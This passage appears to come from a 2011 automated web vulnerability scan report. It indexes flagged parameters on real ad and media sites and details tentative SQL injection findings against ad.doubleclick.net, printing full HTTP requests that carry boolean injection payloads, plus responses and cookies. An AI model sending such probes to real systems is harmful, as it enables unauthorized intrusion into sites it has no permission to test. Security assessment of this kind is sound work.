5.253. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.254. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.255. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.256. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.257. http://view.c3metrics.com/v.js [cid parameter]

5.258. http://view.c3metrics.com/v.js [id parameter]

5.259. http://view.c3metrics.com/v.js [t parameter]

5.260. http://redacted/m2/webmdcom/mbox/standard [mbox parameter]

5.261. http://widget.linkwithin.com/get_custom_js [callback parameter]

5.262. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]

5.263. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]

5.264. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 1]

5.265. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 1]

5.266. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 2]

5.267. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 2]

5.268. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 3]

5.269. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 3]

5.270. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 1]

5.271. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 1]

5.272. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 2]

5.273. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 2]

5.274. http://www.indiantelevision.com/favicon271208.ico [REST URL parameter 1]

5.275. http://www.indiantelevision.com/favicon271208.ico [REST URL parameter 1]

5.276. http://www.indiantelevision.com/phpadsnew/adx.js [REST URL parameter 1]

5.277. http://www.indiantelevision.com/phpadsnew/adx.js [REST URL parameter 1]

5.278. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 1]

5.279. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 1]

5.280. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 2]

5.281. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 2]

5.282. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 3]

5.283. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 3]

5.284. http://www.mayoclinic.com/health/pink-eye/DS00258 [REST URL parameter 1]

5.285. http://www.mayoclinic.com/images/nav/shields.ico [REST URL parameter 1]

5.286. http://www.mayoclinic.com/images/nav/shields.ico [REST URL parameter 2]

5.287. http://www.mayoclinic.com/images/nav/shields.ico [REST URL parameter 3]

5.288. http://www.medicinenet.com/pointroll/prs.htm [REST URL parameter 1]

5.289. http://www.onsugar.com/h [REST URL parameter 1]

5.290. http://www.onsugar.com/h [REST URL parameter 1]

5.291. http://www.onsugar.com/help [REST URL parameter 1]

5.292. http://www.onsugar.com/help [REST URL parameter 1]

5.293. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

5.294. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

5.295. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

5.296. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

5.297. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [background parameter]

5.298. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [border parameter]

5.299. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [height parameter]

5.300. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infobackground parameter]

5.301. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infocolor parameter]

5.302. http://www.starpulse.com/Adserver/Common-300-Mid.html [page_channel parameter]

5.303. http://www.starpulse.com/Contests/Blue_Valentine_DVD_amp [REST URL parameter 2]

5.304. http://www.starpulse.com/Contests/Blue_Valentine_DVD_amp [_Soundtrack/5580/ parameter]

5.305. http://www.starpulse.com/Contests/Blue_Valentine_DVD_amp [name of an arbitrarily supplied request parameter]

5.306. http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/ [REST URL parameter 2]

5.307. http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/ [REST URL parameter 3]

5.308. http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/ [name of an arbitrarily supplied request parameter]

5.309. http://www.starpulse.com/Contests/Skateland_Prize_Pack/5663/ [REST URL parameter 2]

5.310. http://www.starpulse.com/Contests/Skateland_Prize_Pack/5663/ [REST URL parameter 3]

5.311. http://www.starpulse.com/Contests/Skateland_Prize_Pack/5663/ [name of an arbitrarily supplied request parameter]

5.312. http://www.starpulse.com/Contests/Something_Borrowed_Prize_Pack/5622/ [REST URL parameter 2]

5.313. http://www.starpulse.com/Contests/Something_Borrowed_Prize_Pack/5622/ [REST URL parameter 3]

5.314. http://www.starpulse.com/Contests/Something_Borrowed_Prize_Pack/5622/ [name of an arbitrarily supplied request parameter]

5.315. http://www.starpulse.com/Contests/Soul_Surfer_Prize_Pack/5561/ [REST URL parameter 2]

5.316. http://www.starpulse.com/Contests/Soul_Surfer_Prize_Pack/5561/ [REST URL parameter 3]

5.317. http://www.starpulse.com/Contests/Soul_Surfer_Prize_Pack/5561/ [name of an arbitrarily supplied request parameter]

5.318. http://www.starpulse.com/index.html [name of an arbitrarily supplied request parameter]

5.319. http://www.starpulse.com/news/ [name of an arbitrarily supplied request parameter]

5.320. http://www.starpulse.com/news/ [name of an arbitrarily supplied request parameter]

5.321. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 2]

5.322. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 2]

5.323. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 3]

5.324. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 3]

5.325. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 4]

5.326. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 4]

5.327. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 5]

5.328. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 5]

5.329. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 6]

5.330. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 6]

5.331. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [name of an arbitrarily supplied request parameter]

5.332. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [name of an arbitrarily supplied request parameter]

5.333. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 2]

5.334. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 2]

5.335. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 3]

5.336. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 3]

5.337. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 4]

5.338. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 4]

5.339. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 5]

5.340. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 5]

5.341. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 6]

5.342. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 6]

5.343. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [name of an arbitrarily supplied request parameter]

5.344. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [name of an arbitrarily supplied request parameter]

5.345. http://www.thedailystamford.com/news/contagious-pink-eye-among-us [name of an arbitrarily supplied request parameter]

5.346. http://www.tressugar.com/Cannes-Film-Festival-History-16415520 [REST URL parameter 1]

5.347. http://www.tressugar.com/Cannes-Film-Festival-History-16415520 [REST URL parameter 1]

5.348. http://www.webmd.com/modules/sponsor-box [AdID parameter]

5.349. http://www.webmd.com/modules/sponsor-box [FlightID parameter]

5.350. http://www.webmd.com/modules/sponsor-box [Redirect parameter]

5.351. http://www.webmd.com/modules/sponsor-box [TargetID parameter]

5.352. http://www.webmd.com/modules/sponsor-box [Values parameter]

5.353. http://www.webmd.com/modules/sponsor-box [id parameter]

5.354. http://www.webmd.com/modules/sponsor-box [name of an arbitrarily supplied request parameter]

5.355. http://www.webmd.com/modules/sponsor-box [pos parameter]

5.356. http://www.zap2it.com/templates/collection/main-tab03.jsp [REST URL parameter 1]

5.357. http://www.zap2it.com/templates/collection/main-tab03.jsp [REST URL parameter 2]

5.358. http://www.zap2it.com/templates/misc/photo-jsinclude.jsp [REST URL parameter 1]

5.359. http://www.zap2it.com/templates/misc/photo-jsinclude.jsp [REST URL parameter 2]

5.360. http://www.zap2it.com/videobeta/watch/ [REST URL parameter 2]

5.361. http://www.zap2it.com/videobeta/watch/ [cat parameter]

5.362. http://www.zap2it.com/videobeta/watch/ [watch parameter]

5.363. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]

5.364. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [zone parameter]

5.365. http://www24a.glam.com/appdir/getscript.jsp [view parameter]

5.366. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]

5.367. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

5.368. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

5.369. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

5.370. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [Referer HTTP header]

5.371. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [Referer HTTP header]

5.372. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [Referer HTTP header]

5.373. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.374. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [cli cookie]

5.375. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [cli cookie]

5.376. http://a.rfihub.com/sed [a cookie]

5.377. http://a.rfihub.com/sed [a1 cookie]

5.378. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.379. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.380. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.381. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.382. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.383. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

5.384. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

5.385. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.386. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

5.387. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.388. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.389. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.390. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.391. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.392. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [ZEDOIDA cookie]

5.393. http://k.collective-media.net/cmadj/cm.pub_webmd/ [cli cookie]

5.394. http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911 [cli cookie]

5.395. http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911 [cli cookie]

5.396. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.397. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [meld_sess cookie]

5.398. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [meld_sess cookie]

5.399. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.400. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]

5.401. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

5.402. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]

1. SQL injection
There are 21 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 28542467%20or%201%3d1--%20 and 28542467%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?&128542467%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:56 GMT
Content-Length: 949

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/p;228460379;1-0;0;50166444;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a></body></html>

Request 2

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?&128542467%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:57 GMT
Content-Length: 936

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a></body></html>

1.2. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:28 GMT
Content-Length: 936

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a></body></html>

Request 2

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:29 GMT
Content-Length: 949

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/p;228460379;1-0;0;50166444;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a></body></html>

